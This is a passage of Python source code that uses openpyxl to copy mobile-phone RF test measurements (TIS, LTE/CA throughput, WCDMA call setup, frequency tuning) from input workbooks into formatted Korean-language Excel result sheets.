'-87.00dBm'\n sheet_out['C12'] = list_lte_tis[2] + 'dBm'\n # sheet_out['D12'] = self.check_num(abs(round(abs(float(list_lte_tis[2])) - 87.00, 2))) + 'dBm'\n sheet_out['D12'] = self.cal_comparison(87.00, list_lte_tis[2]) + 'dBm'\n sheet_out['A13'] = 'Band 7 20M'\n sheet_out['B13'] = '-90.00dBm'\n sheet_out['C13'] = list_lte_tis[3] + 'dBm'\n sheet_out['D13'] = self.check_num(abs(round(abs(float(list_lte_tis[3])) - 90.00, 2))) + 'dBm'\n sheet_out['D13'] = self.cal_comparison(90.00, list_lte_tis[3]) + 'dBm'\n sheet_out['A14'] = 'Band 7 10M'\n sheet_out['B14'] = '-93.00dBm'\n sheet_out['C14'] = list_lte_tis[4] + 'dBm'\n # sheet_out['D14'] = self.check_num(abs(round(abs(float(list_lte_tis[4])) - 93.00, 2))) + 'dBm'\n sheet_out['D14'] = self.cal_comparison(93.00, list_lte_tis[4]) + 'dBm'\n\n # sheet row 16 and 18 handle\n sheet_out['A15'] = ' - WCDMA (납품검사 결과)'\n sheet_out['A16'] = '구분'\n sheet_out['B16'] = '기준(RHP)'\n sheet_out['C16'] = '측정결과'\n sheet_out['D16'] = '비교'\n sheet_out['A17'] = 'Band 1'\n sheet_out['B17'] = '-104.00dBm'\n sheet_out['C17'] = list_wcdma_tis[0] + 'dBm'\n # sheet_out['D17'] = self.check_num(abs(round(abs(float(list_wcdma_tis[0])) - 104.00, 2))) + 'dBm'\n sheet_out['D17'] = self.cal_comparison(104.00, list_wcdma_tis[0]) + 'dBm'\n\n # sheet row 19 and 22 handle\n sheet_out['A19'] = '▣ MIMO TRP'\n sheet_out['A20'] = ' - 5G'\n sheet_out['A21'] = '구분'\n sheet_out['B21'] = '기준(RHP)'\n sheet_out['C21'] = '측정결과'\n sheet_out['D21'] = '비교'\n sheet_out['A22'] = 'MIMO 4X4 (n78)'\n sheet_out['B22'] = '-'\n sheet_out['C22'] = list_5g_tis[1] + 'dBm'\n sheet_out['D22'] = '-'\n\n # sheet row 24 and 30 handle\n sheet_out['A24'] = ' - LTE'\n sheet_out['A25'] = '구분'\n sheet_out['B25'] = '기준(RHP)'\n sheet_out['C25'] = '측정결과'\n sheet_out['D25'] = '비교'\n sheet_out['A26'] = 'Band 1 15M'\n sheet_out['B26'] = '-86.00dBm'\n sheet_out['C26'] = list_lte_tis[5] + 'dBm'\n # sheet_out['D26'] = self.check_num(abs(round(abs(float(list_lte_tis[5])) - 86.00, 2))) + 'dBm'\n sheet_out['D26'] = self.cal_comparison(86.00, list_lte_tis[5]) + 'dBm'\n sheet_out['A27'] = 'Band 3 20M'\n sheet_out['B27'] = '-86.00dBm'\n sheet_out['C27'] = list_lte_tis[6] + 'dBm'\n # sheet_out['D27'] = self.check_num(abs(round(abs(float(list_lte_tis[6])) - 86.00, 2))) + 'dBm'\n sheet_out['D27'] = self.cal_comparison(86.00, list_lte_tis[6]) + 'dBm'\n sheet_out['A28'] = 'Band 5 10M'\n sheet_out['B28'] = '-82.50dBm'\n sheet_out['C28'] = list_lte_tis[7] + 'dBm'\n # sheet_out['D28'] = self.check_num(abs(round(abs(float(list_lte_tis[7])) - 82.50, 2))) + 'dBm'\n sheet_out['D28'] = self.cal_comparison(82.50, list_lte_tis[7]) + 'dBm'\n sheet_out['A29'] = 'Band 7 20M'\n sheet_out['B29'] = '-84.00dBm'\n sheet_out['C29'] = list_lte_tis[8] + 'dBm'\n # sheet_out['D29'] = self.check_num(abs(round(abs(float(list_lte_tis[8])) - 84.00, 2))) + 'dBm'\n sheet_out['D29'] = self.cal_comparison(84.00, list_lte_tis[8]) + 'dBm'\n sheet_out['A30'] = 'Band 7 10M'\n sheet_out['B30'] = '-87.00dBm'\n sheet_out['C30'] = list_lte_tis[9] + 'dBm'\n # sheet_out['D30'] = self.check_num(abs(round(abs(float(list_lte_tis[9])) - 87.00, 2))) + 'dBm'\n sheet_out['D30'] = self.cal_comparison(87.00, list_lte_tis[9]) + 'dBm'\n\n self.setPrintText('/s {}번 파일 \"TIS\" 테이터 입력 완료 /e'.format(idx+1))\n\n # set temp data\n\n if self.opFlag:\n\n # all cell alignment adjust\n for mCell in sheet_out[\"A1:D30\"]:\n for cell in mCell:\n cell.alignment = self.general_alignment\n # top alignment adjust\n sheet_out['A3'].alignment = self.top_alignment\n sheet_out['A4'].alignment = 
self.top_alignment\n sheet_out['A8'].alignment = self.top_alignment\n sheet_out['A15'].alignment = self.top_alignment\n sheet_out['A19'].alignment = self.top_alignment\n sheet_out['A20'].alignment = self.top_alignment\n sheet_out['A24'].alignment = self.top_alignment\n\n # all cell border adjust\n for mCell in sheet_out[\"A5:D6\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # all cell border adjust\n for mCell in sheet_out[\"A9:D14\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # all cell border adjust\n for mCell in sheet_out[\"A16:D17\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # all cell border adjust\n for mCell in sheet_out[\"A21:D22\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # all cell border adjust\n for mCell in sheet_out[\"A25:D30\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # all cell font adjust\n for mCell in sheet_out[\"A3:D30\"]:\n for cell in mCell:\n cell.font = self.index_font\n\n sheet_out['A1'].font = Font(name='맑은 고딕', size=22, bold=True, color='2B2B2B')\n\n # each coloum width adjust\n sheet_cell_list = ['A', 'B', 'C', 'D']\n sheet_width_list = [25, 15, 17, 15]\n\n for i in range(len(sheet_cell_list)):\n sheet_out.column_dimensions[sheet_cell_list[i]].width = sheet_width_list[i]\n sheet_out.row_dimensions[1].height = 45\n\n # Set Pattern Fill\n\n for i in [5, 9, 16, 21, 25]:\n sheet_out['A' + str(i)].fill = self.brown_fill\n sheet_out['B' + str(i)].fill = self.brown_fill\n sheet_out['C' + str(i)].fill = self.brown_fill\n sheet_out['D' + str(i)].fill = self.brown_fill\n\n for i in [6, 10, 11, 12, 13, 14, 17, 22, 26, 27, 28, 29, 30]:\n sheet_out['A'+str(i)].fill = self.gray_fill\n sheet_out['B'+str(i)].fill = self.apricot_fill\n\n self.currentRow = self.currentRow + 1\n self.setPrintText('/s {}번 파일 \"TIS\" 시트 스타일 적용 완료 /e'.format(idx+1))\n # save file\n wb_output.save(self.list_out_files[idx])\n except:\n self.setPrintText('/s Error: {}. 
{}, line: {}'.format(sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2].tb_lineno)+' /e')\n self.end_count = \"y\"\n self.end_flag.emit()\n\n # 속도 Tab\n def spd_generate_data(self):\n\n try:\n for idx, item in enumerate(self.list_files):\n\n wb_input = openpyxl.load_workbook(item, data_only=True)\n wb_output = openpyxl.load_workbook(self.list_out_files[idx])\n list_lte_spd = []\n\n # get data from wb_input\n sheet_in = wb_input['LTE OTA']\n # MIMO\n list_lte_spd.append(self.check_num(sheet_in['I25'].value))\n list_lte_spd.append(self.check_num(sheet_in['J25'].value))\n list_lte_spd.append(self.check_num(sheet_in['K25'].value))\n list_lte_spd.append(self.check_num(sheet_in['F25'].value))\n list_lte_spd.append(self.check_num(sheet_in['G25'].value))\n list_lte_spd.append(self.check_num(sheet_in['H25'].value))\n list_lte_spd.append(self.check_num(sheet_in['C25'].value))\n list_lte_spd.append(self.check_num(sheet_in['D25'].value))\n list_lte_spd.append(self.check_num(sheet_in['E25'].value))\n list_lte_spd.append(self.check_num(sheet_in['L25'].value))\n list_lte_spd.append(self.check_num(sheet_in['M25'].value))\n list_lte_spd.append(self.check_num(sheet_in['N25'].value))\n list_lte_spd.append(self.check_num(sheet_in['O25'].value))\n list_lte_spd.append(self.check_num(sheet_in['P25'].value))\n list_lte_spd.append(self.check_num(sheet_in['Q25'].value))\n # CA\n list_lte_spd.append(self.check_num(sheet_in['C33'].value))\n list_lte_spd.append(self.check_num(sheet_in['D33'].value))\n list_lte_spd.append(self.check_num(sheet_in['E33'].value))\n list_lte_spd.append(self.check_num(sheet_in['F33'].value))\n list_lte_spd.append(self.check_num(sheet_in['G33'].value))\n list_lte_spd.append(self.check_num(sheet_in['H33'].value))\n list_lte_spd.append(self.check_num(sheet_in['I33'].value))\n list_lte_spd.append(self.check_num(sheet_in['J33'].value))\n list_lte_spd.append(self.check_num(sheet_in['K33'].value))\n list_lte_spd.append(self.check_num(sheet_in['L33'].value))\n list_lte_spd.append(self.check_num(sheet_in['M33'].value))\n list_lte_spd.append(self.check_num(sheet_in['N33'].value))\n list_lte_spd.append(self.check_num(sheet_in['O33'].value))\n list_lte_spd.append(self.check_num(sheet_in['P33'].value))\n list_lte_spd.append(self.check_num(sheet_in['Q33'].value))\n list_lte_spd.append(self.check_num(sheet_in['R33'].value))\n list_lte_spd.append(self.check_num(sheet_in['S33'].value))\n list_lte_spd.append(self.check_num(sheet_in['T33'].value))\n\n #option setting wb.output\n sheet_out = wb_output['속도']\n # sheet row 2 handle\n sheet_out.merge_cells('A1:C1')\n sheet_out['A1'] = '속도 결과'\n\n # 3~4 row\n sheet_out['A3'] = '▣ MIMO 속도'\n sheet_out['A4'] = ' - LTE'\n\n # sheet row 5 and 20 handle\n sheet_out['A5'] = '구분'\n sheet_out.merge_cells('B5:C5')\n sheet_out['B5'] = '기준(Free)'\n sheet_out['D5'] = '측정결과'\n sheet_out['E5'] = '비교'\n\n sheet_out.merge_cells('A6:A8')\n sheet_out['A6'] = 'Band 1 15M(MCS28)'\n sheet_out['B6'] = 'RSSI'\n sheet_out['B7'] = '속도(Absolute)'\n sheet_out['B8'] = 'BLER'\n sheet_out['C6'] = '-61.00dBm'\n sheet_out['C7'] = '87700Kbps'\n sheet_out['C8'] = '20.00%'\n sheet_out['D6'] = list_lte_spd[0] + 'dBm'\n sheet_out['D7'] = list_lte_spd[1] + 'Kbps'\n sheet_out['D8'] = list_lte_spd[2] + '%'\n # sheet_out['E6'] = self.check_num(abs(round(abs(float(list_lte_spd[0])) - 61.00, 2))) + 'dBm'\n # sheet_out['E7'] = self.check_num(abs(round(abs(float(list_lte_spd[1])) - 87700, 2))) + 'Kbps'\n # sheet_out['E8'] = self.check_num(abs(round(abs(float(list_lte_spd[2])) - 20.00, 2))) + '%'\n 
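                # cal_comparison() below computes the same abs/round difference as the commented-out check_num lines kept above for reference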
                sheet_out['E6'] = self.cal_comparison(61.00, list_lte_spd[0]) + 'dBm'
                sheet_out['E7'] = self.cal_comparison(87700.00, list_lte_spd[1]) + 'Kbps'
                sheet_out['E8'] = self.cal_comparison(20.00, list_lte_spd[2]) + '%'

                sheet_out.merge_cells('A9:A11')
                sheet_out['A9'] = 'Band 3 20M(MCS28)'
                sheet_out['B9'] = 'RSSI'
                sheet_out['B10'] = '속도(Absolute)'
                sheet_out['B11'] = 'BLER'
                sheet_out['C9'] = '-61.00dBm'
                sheet_out['C10'] = '119900Kbps'
                sheet_out['C11'] = '20.00%'
                sheet_out['D9'] = list_lte_spd[3] + 'dBm'
                sheet_out['D10'] = list_lte_spd[4] + 'Kbps'
                sheet_out['D11'] = list_lte_spd[5] + '%'
                # sheet_out['E9'] = self.check_num(abs(round(abs(float(list_lte_spd[3])) - 61.00, 2))) + 'dBm'
                # sheet_out['E10'] = self.check_num(abs(round(abs(float(list_lte_spd[4])) - 119900, 2))) + 'Kbps'
                # sheet_out['E11'] = self.check_num(abs(round(abs(float(list_lte_spd[5])) - 20.00, 2))) + '%'
                sheet_out['E9'] = self.cal_comparison(61.00, list_lte_spd[3]) + 'dBm'
                sheet_out['E10'] = self.cal_comparison(119900.00, list_lte_spd[4]) + 'Kbps'
                sheet_out['E11'] = self.cal_comparison(20.00, list_lte_spd[5]) + '%'

                sheet_out.merge_cells('A12:A14')
                sheet_out['A12'] = 'Band 5 10M(MCS27)'
                sheet_out['B12'] = 'RSSI'
                sheet_out['B13'] = '속도(Absolute)'
                sheet_out['B14'] = 'BLER'
                sheet_out['C12'] = '-60.00dBm'
                sheet_out['C13'] = '50300Kbps'
                sheet_out['C14'] = '20.00%'
                sheet_out['D12'] = list_lte_spd[6] + 'dBm'
                sheet_out['D13'] = list_lte_spd[7] + 'Kbps'
                sheet_out['D14'] = list_lte_spd[8] + '%'
                # sheet_out['E12'] = self.check_num(abs(round(abs(float(list_lte_spd[6])) - 60.00, 2))) + 'dBm'
                # sheet_out['E13'] = self.check_num(abs(round(abs(float(list_lte_spd[7])) - 50300, 2))) + 'Kbps'
                # sheet_out['E14'] = self.check_num(abs(round(abs(float(list_lte_spd[8])) - 20.00, 2))) + '%'
                sheet_out['E12'] = self.cal_comparison(60.00, list_lte_spd[6]) + 'dBm'
                sheet_out['E13'] = self.cal_comparison(50300.00, list_lte_spd[7]) + 'Kbps'
                sheet_out['E14'] = self.cal_comparison(20.00, list_lte_spd[8]) + '%'

                sheet_out.merge_cells('A15:A17')
                sheet_out['A15'] = 'Band 7 20M(MCS28)'
                sheet_out['B15'] = 'RSSI'
                sheet_out['B16'] = '속도(Absolute)'
                sheet_out['B17'] = 'BLER'
                sheet_out['C15'] = '-60.00dBm'
                sheet_out['C16'] = '119900Kbps'
                sheet_out['C17'] = '20.00%'
                sheet_out['D15'] = list_lte_spd[9] + 'dBm'
                sheet_out['D16'] = list_lte_spd[10] + 'Kbps'
                sheet_out['D17'] = list_lte_spd[11] + '%'
                # sheet_out['E15'] = self.check_num(abs(round(abs(float(list_lte_spd[9])) - 60.00, 2))) + 'dBm'
                # sheet_out['E16'] = self.check_num(abs(round(abs(float(list_lte_spd[10])) - 119900, 2))) + 'Kbps'
                # sheet_out['E17'] = self.check_num(abs(round(abs(float(list_lte_spd[11])) - 20.00, 2))) + '%'
                sheet_out['E15'] = self.cal_comparison(60.00, list_lte_spd[9]) + 'dBm'
                sheet_out['E16'] = self.cal_comparison(119900.00, list_lte_spd[10]) + 'Kbps'
                sheet_out['E17'] = self.cal_comparison(20.00, list_lte_spd[11]) + '%'

                sheet_out.merge_cells('A18:A20')
                sheet_out['A18'] = 'Band 7 10M(MCS27)'
                sheet_out['B18'] = 'RSSI'
                sheet_out['B19'] = '속도(Absolute)'
                sheet_out['B20'] = 'BLER'
                sheet_out['C18'] = '-60.00dBm'
                sheet_out['C19'] = '50300Kbps'
                sheet_out['C20'] = '20.00%'
                sheet_out['D18'] = list_lte_spd[12] + 'dBm'
                sheet_out['D19'] = list_lte_spd[13] + 'Kbps'
                sheet_out['D20'] = list_lte_spd[14] + '%'
                # sheet_out['E18'] = self.check_num(abs(round(abs(float(list_lte_spd[12])) - 60.00, 2))) + 'dBm'
                # sheet_out['E19'] = self.check_num(abs(round(abs(float(list_lte_spd[13])) - 50300, 2))) + 'Kbps'
                # sheet_out['E20'] = self.check_num(abs(round(abs(float(list_lte_spd[14])) - 20.00, 2))) + '%'
                sheet_out['E18'] = self.cal_comparison(60.00, list_lte_spd[12]) + 'dBm'
                sheet_out['E19'] = self.cal_comparison(50300.00, list_lte_spd[13]) + 'Kbps'
                sheet_out['E20'] = self.cal_comparison(20.00, list_lte_spd[14]) + '%'


                # 22 ~ 23 row
                sheet_out['A22'] = '▣ CA 속도'
                sheet_out['A23'] = ' - LTE'

                # sheet row 24 and 42 handle
                sheet_out['A24'] = '구분'
                sheet_out.merge_cells('B24:C24')
                sheet_out['B24'] = '기준(Free)'
                sheet_out['D24'] = '측정결과'
                sheet_out['E24'] = '비교'

                sheet_out.merge_cells('A25:A27')
                sheet_out['A25'] = '2CA : B3+B5(MCS28)'
                sheet_out['B25'] = 'RSSI'
                sheet_out['B26'] = '속도(Absolute)'
                sheet_out['B27'] = 'BLER'
                sheet_out['C25'] = '-58.00dBm'
                sheet_out['C26'] = '178390Kbps'
                sheet_out['C27'] = '-'
                sheet_out['D25'] = list_lte_spd[15] + 'dBm'
                sheet_out['D26'] = list_lte_spd[16] + 'Kbps'
                sheet_out['D27'] = list_lte_spd[17] + '%'
                # sheet_out['E25'] = self.check_num(abs(round(abs(float(list_lte_spd[15])) - 58.00, 2))) + 'dBm'
                # sheet_out['E26'] = self.check_num(abs(round(abs(float(list_lte_spd[16])) - 178390, 2))) + 'Kbps'
                sheet_out['E25'] = self.cal_comparison(58.00, list_lte_spd[15]) + 'dBm'
                sheet_out['E26'] = self.cal_comparison(178390.00, list_lte_spd[16]) + 'Kbps'
                sheet_out['E27'] = '-'

                sheet_out.merge_cells('A28:A30')
                sheet_out['A28'] = '3CA : B7(20M)+B3+B1(MCS28)'
                sheet_out['B28'] = 'RSSI'
                sheet_out['B29'] = '속도(Absolute)'
                sheet_out['B30'] = 'BLER'
                sheet_out['C28'] = '-58.00dBm'
                sheet_out['C29'] = '327500Kbps'
                sheet_out['C30'] = '-'
                sheet_out['D28'] = list_lte_spd[18] + 'dBm'
                sheet_out['D29'] = list_lte_spd[19] + 'Kbps'
                sheet_out['D30'] = list_lte_spd[20] + '%'
                # sheet_out['E28'] = self.check_num(abs(round(abs(float(list_lte_spd[18])) - 58.00, 2))) + 'dBm'
                # sheet_out['E29'] = self.check_num(abs(round(abs(float(list_lte_spd[19])) - 327500, 2))) + 'Kbps'
                sheet_out['E28'] = self.cal_comparison(58.00, list_lte_spd[18]) + 'dBm'
                sheet_out['E29'] = self.cal_comparison(327500.00, list_lte_spd[19]) + 'Kbps'
                sheet_out['E30'] = '-'

                sheet_out.merge_cells('A31:A33')
                sheet_out['A31'] = '3CA : B7(20M)+B3+B5(MCS28)'
                sheet_out['B31'] = 'RSSI'
                sheet_out['B32'] = '속도(Absolute)'
                sheet_out['B33'] = 'BLER'
                sheet_out['C31'] = '-58.00dBm'
                sheet_out['C32'] = '298300Kbps'
                sheet_out['C33'] = '-'
                sheet_out['D31'] = list_lte_spd[21] + 'dBm'
                sheet_out['D32'] = list_lte_spd[22] + 'Kbps'
                sheet_out['D33'] = list_lte_spd[23] + '%'
                # sheet_out['E31'] = self.check_num(abs(round(abs(float(list_lte_spd[21])) - 58.00, 2))) + 'dBm'
                # sheet_out['E32'] = self.check_num(abs(round(abs(float(list_lte_spd[22])) - 298300, 2))) + 'Kbps'
                sheet_out['E31'] = self.cal_comparison(58.00, list_lte_spd[21]) + 'dBm'
                sheet_out['E32'] = self.cal_comparison(298300.00, list_lte_spd[22]) + 'Kbps'
                sheet_out['E33'] = '-'

                sheet_out.merge_cells('A34:A36')
                sheet_out['A34'] = '3CA : B7(20M)+B3+B7(MCS28)'
                sheet_out['B34'] = 'RSSI'
                sheet_out['B35'] = '속도(Absolute)'
                sheet_out['B36'] = 'BLER'
                sheet_out['C34'] = '-58.00dBm'
                sheet_out['C35'] = '298300Kbps'
                sheet_out['C36'] = '-'
                sheet_out['D34'] = list_lte_spd[24] + 'dBm'
                sheet_out['D35'] = list_lte_spd[25] + 'Kbps'
                sheet_out['D36'] = list_lte_spd[26] + '%'
                # sheet_out['E34'] = self.check_num(abs(round(abs(float(list_lte_spd[24])) - 58.00, 2))) + 'dBm'
                # sheet_out['E35'] = self.check_num(abs(round(abs(float(list_lte_spd[25])) - 298300, 2))) + 'Kbps'
                sheet_out['E34'] = self.cal_comparison(58.00, list_lte_spd[24]) + 'dBm'
                sheet_out['E35'] = self.cal_comparison(298300.00, list_lte_spd[25]) + 'Kbps'
                sheet_out['E36'] = '-'

                sheet_out.merge_cells('A37:A39')
                sheet_out['A37'] = '4CA : B7(20M)+B3+B5+B1(MCS28)'
                sheet_out['B37'] = 'RSSI'
                sheet_out['B38'] = '속도(Absolute)'
                sheet_out['B39'] = 'BLER'
                sheet_out['C37'] = '-57.00dBm'
                sheet_out['C38'] = '386000Kbps'
                sheet_out['C39'] = '-'
                sheet_out['D37'] = list_lte_spd[27] + 'dBm'
                sheet_out['D38'] = list_lte_spd[28] + 'Kbps'
                sheet_out['D39'] = list_lte_spd[29] + '%'
                # sheet_out['E37'] = self.check_num(abs(round(abs(float(list_lte_spd[27])) - 57.00, 2))) + 'dBm'
                # sheet_out['E38'] = self.check_num(abs(round(abs(float(list_lte_spd[28])) - 386000, 2))) + 'Kbps'
                sheet_out['E37'] = self.cal_comparison(57.00, list_lte_spd[27]) + 'dBm'
                sheet_out['E38'] = self.cal_comparison(386000.00, list_lte_spd[28]) + 'Kbps'
                sheet_out['E39'] = '-'

                sheet_out.merge_cells('A40:A42')
                sheet_out['A40'] = '5CA : B7+B3+B5+B1+B7(MCS28)'
                sheet_out['B40'] = 'RSSI'
                sheet_out['B41'] = '속도(Absolute)'
                sheet_out['B42'] = 'BLER'
                sheet_out['C40'] = '-56.00dBm'
                sheet_out['C41'] = '444500Kbps'
                sheet_out['C42'] = '-'
                sheet_out['D40'] = list_lte_spd[30] + 'dBm'
                sheet_out['D41'] = list_lte_spd[31] + 'Kbps'
                sheet_out['D42'] = list_lte_spd[32] + '%'
                # sheet_out['E40'] = self.check_num(abs(round(abs(float(list_lte_spd[30])) - 56.00, 2))) + 'dBm'
                # sheet_out['E41'] = self.check_num(abs(round(abs(float(list_lte_spd[31])) - 444500, 2))) + 'Kbps'
                sheet_out['E40'] = self.cal_comparison(56.00, list_lte_spd[30]) + 'dBm'
                sheet_out['E41'] = self.cal_comparison(444500.00, list_lte_spd[31]) + 'Kbps'
                sheet_out['E42'] = '-'

                self.setPrintText('/s {}번 파일 "속도" 데이터 입력 완료 /e'.format(idx+1))

                # set temp data

                if self.opFlag:

                    # all cell alignment adjust
                    for mCell in sheet_out["A1:E42"]:
                        for cell in mCell:
                            cell.alignment = self.general_alignment
                    # top alignment adjust
                    sheet_out['A3'].alignment = self.top_alignment
                    sheet_out['A4'].alignment = self.top_alignment
                    sheet_out['A22'].alignment = self.top_alignment
                    sheet_out['A23'].alignment = self.top_alignment

                    # all cell border adjust
                    for mCell in sheet_out["A5:E20"]:
                        for cell in mCell:
                            cell.border = self.thin_border

                    # all cell border adjust
                    for mCell in sheet_out["A24:E42"]:
                        for cell in mCell:
                            cell.border = self.thin_border

                    # all cell font adjust
                    for mCell in sheet_out["A3:E42"]:
                        for cell in mCell:
                            cell.font = self.index_font

                    sheet_out['A1'].font = Font(name='맑은 고딕', size=22, bold=True, color='2B2B2B')

                    # each column width adjust
                    sheet_cell_list = ['A', 'B', 'C', 'D', 'E']
                    sheet_width_list = [20.63, 14, 14, 17, 15]

                    for i in range(len(sheet_cell_list)):
                        sheet_out.column_dimensions[sheet_cell_list[i]].width = sheet_width_list[i]
                    sheet_out.row_dimensions[1].height = 45

                    # Set Pattern Fill
                    for i in [6, 9, 12, 15, 18, 25, 28, 31, 34, 37, 40]:
                        sheet_out['A' + str(i)].fill = self.gray_fill

                    for col in ['A', 'B', 'D', 'E']:
                        sheet_out[col + '5'].fill = self.brown_fill
                        sheet_out[col + '24'].fill = self.brown_fill

                    for i in range(6, 21):
                        sheet_out['B'+str(i)].fill = self.apricot_fill
                        sheet_out['C'+str(i)].fill = self.apricot_fill

                    for i in range(25, 43):
                        sheet_out['B'+str(i)].fill = self.apricot_fill
                        sheet_out['C'+str(i)].fill = self.apricot_fill

                self.currentRow = self.currentRow + 1
                self.setPrintText('/s {}번 파일 "속도" 시트 스타일 적용 완료 /e'.format(idx+1))
                # save file
                wb_output.save(self.list_out_files[idx])
        except:
            self.setPrintText('/s Error: {}. {}, line: {}'.format(sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2].tb_lineno)+' /e')
            self.end_count = "y"
            self.end_flag.emit()

    # Call Setup Tab
    def call_generate_data(self):

        try:
            for idx, item in enumerate(self.list_files):

                wb_input = openpyxl.load_workbook(item, data_only=True)
                wb_output = openpyxl.load_workbook(self.list_out_files[idx])
                call_val = ''

                # get data from wb_input
                sheet_in = wb_input['Call Test']

                call_val = self.check_num(sheet_in['D8'].value)

                # option setting wb_output
                sheet_out = wb_output['Call Setup Test']
                # sheet row 2 handle
                sheet_out.merge_cells('A1:C1')
                sheet_out['A1'] = 'Call Setup Test 결과'

                # 3~4 row
                sheet_out['A2'] = ' - WCDMA Call Setup Test'
                sheet_out['A3'] = '구분'
                sheet_out['B3'] = '기준'
                sheet_out['C3'] = '측정결과'
                sheet_out['D3'] = '비교'
                sheet_out['A4'] = 'Band 1'
                sheet_out['B4'] = ' -104.5dBm 이하'
                sheet_out['C4'] = call_val
                sheet_out['D4'] = '-'

                self.setPrintText('/s {}번 파일 "Call Setup Test" 데이터 입력 완료 /e'.format(idx+1))

                # set temp data

                if self.opFlag:

                    # all cell alignment adjust
                    for mCell in sheet_out["A1:D4"]:
                        for cell in mCell:
                            cell.alignment = self.general_alignment
                    # top alignment adjust
                    sheet_out['A2'].alignment = self.top_alignment

                    # all cell border adjust
                    for mCell in sheet_out["A3:D4"]:
                        for cell in mCell:
                            cell.border = self.thin_border

                    # all cell font adjust
                    for mCell in sheet_out["A2:D4"]:
                        for cell in mCell:
                            cell.font = self.index_font

                    sheet_out['A1'].font = Font(name='맑은 고딕', size=22, bold=True, color='2B2B2B')

                    # each column width adjust
                    sheet_cell_list = ['A', 'B', 'C', 'D']
                    sheet_width_list = [25, 15.88, 17, 15]

                    for i in range(len(sheet_cell_list)):
                        sheet_out.column_dimensions[sheet_cell_list[i]].width = sheet_width_list[i]
                    sheet_out.row_dimensions[1].height = 45

                    # Set Pattern Fill
                    sheet_out['A4'].fill = self.gray_fill

                    for col in ['A', 'B', 'C', 'D']:
                        sheet_out[col + '3'].fill = self.brown_fill

                    sheet_out['B4'].fill = self.apricot_fill

                self.currentRow = self.currentRow + 1
                self.setPrintText('/s {}번 파일 "Call Setup Test" 시트 스타일 적용 완료 /e'.format(idx+1))
                # save file
                wb_output.save(self.list_out_files[idx])
        except:
            self.setPrintText('/s Error: {}. {}, line: {}'.format(sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2].tb_lineno)+' /e')
            self.end_count = "y"
            self.end_flag.emit()

    # 주파수동조 Tab
    def fre_generate_data(self):

        try:
            for idx, item in enumerate(self.list_files):

                wb_input = openpyxl.load_workbook(item, data_only=True)
                wb_output = openpyxl.load_workbook(self.list_out_files[idx])
                list_c1 = []
                list_c2 = []
                list_c3 = []
                # get data from wb_input
                sheet_in = wb_input['주파수동조']

                for i in ['C', 'D', 'E', 'F']:
                    list_c1.append(str(sheet_in[i + '5'].value))
                    list_c1.append(str(sheet_in[i + '6'].value))
                    list_c1.append(str(sheet_in[i + '7'].value))

                for i in ['C', 'D']:
                    list_c2.append(str(sheet_in[i + '11'].value))
                    list_c2.append(str(sheet_in[i + '12'].value))
                    list_c2.append(str(sheet_in[i + '13'].value))

                for i in ['C', 'D', 'E', 'F']:
                    list_c3.append(str(sheet_in[i + '17'].value))
                    list_c3.append(str(sheet_in[i + '18'].value))
                    list_c3.append(str(sheet_in[i + '19'].value))

                # option setting wb_output
                sheet_out = wb_output['주파수동조']

                # sheet row 2 handle
                sheet_out.merge_cells('A1:D1')
                sheet_out['A1'] = '주파수동조 결과'

                # 3~8 row
                sheet_out['A3'] = '▣ LTE'
                sheet_out.merge_cells('A4:B4')
                sheet_out['A4'] = '지원 Band 및 정보'
                sheet_out['C4'] = '측정결과'
                sheet_out['D4'] = '비고'
                i = 0
                j = 0
                while i < len(list_c1):

                    sheet_out['A' + str(5 + j)] = list_c1[i]
                    sheet_out['B' + str(5 + j)] = list_c1[i+1]
                    sheet_out['C' + str(5 + j)] = list_c1[i+2]
                    sheet_out['D' + str(5 + j)] = ''
                    i = i + 3
                    j = j + 1

                # 10~13 row
                sheet_out['A10'] = '▣ WCDMA'
                sheet_out.merge_cells('A11:B11')
                sheet_out['A11'] = '지원 Band 및 정보'
                sheet_out['C11'] = '측정결과'
                sheet_out['D11'] = '비고'
                i = 0
                j = 0
                while i < len(list_c2):
                    sheet_out['A' + str(12 + j)] = list_c2[i]
                    sheet_out['B' + str(12 + j)] = list_c2[i + 1]
                    sheet_out['C' + str(12 + j)] = list_c2[i + 2]
                    sheet_out['D' + str(12 + j)] = ''
                    i = i + 3
                    j = j + 1

                # 15~20 row
                sheet_out['A15'] = '▣ GSM'
                sheet_out.merge_cells('A16:B16')
                sheet_out['A16'] = '지원 Band 및 정보'
                sheet_out['C16'] = '측정결과'
                sheet_out['D16'] = '비고'
                i = 0
                j = 0
                while i < len(list_c3):
                    sheet_out['A' + str(17 + j)] = list_c3[i]
                    sheet_out['B' + str(17 + j)] = list_c3[i + 1]
                    sheet_out['C' + str(17 + j)] = list_c3[i + 2]
                    sheet_out['D' + str(17 + j)] = ''
                    i = i + 3
                    j = j + 1

                self.setPrintText('/s {}번 파일 "주파수동조" 데이터 입력 완료 /e'.format(idx+1))

                # set temp data
                if self.opFlag:

                    # all cell alignment adjust
                    for mCell in sheet_out["A1:D20"]:
                        for cell in mCell:
                            cell.alignment = self.general_alignment
                    # top alignment adjust
                    sheet_out['A3'].alignment = self.top_alignment
                    sheet_out['A10'].alignment = self.top_alignment
                    sheet_out['A15'].alignment = self.top_alignment

                    # all cell border adjust
                    for mCell in sheet_out["A4:D8"]:
                        for cell in mCell:
                            cell.border = self.thin_border
                    for mCell in sheet_out["A11:D13"]:
                        for cell in mCell:
                            cell.border = self.thin_border
                    for mCell in sheet_out["A16:D20"]:
                        for cell in mCell:
                            cell.border = self.thin_border
                    # all cell font adjust
                    for mCell in sheet_out["A3:D20"]:
                        for cell in mCell:
                            cell.font = self.index_font

                    sheet_out['A1'].font = Font(name='맑은 고딕', size=22, bold=True, color='2B2B2B')

                    # each column width adjust
                    sheet_cell_list = ['A', 'B', 'C', 'D']
                    sheet_width_list = [15.13, 24.5, 17, 15]

                    for i in range(len(sheet_cell_list)):
                        sheet_out.column_dimensions[sheet_cell_list[i]].width = sheet_width_list[i]
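                    # row 1 carries the merged '주파수동조 결과' title, so it gets extra height below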
                    sheet_out.row_dimensions[1].height = 45

                    # Set Pattern Fill
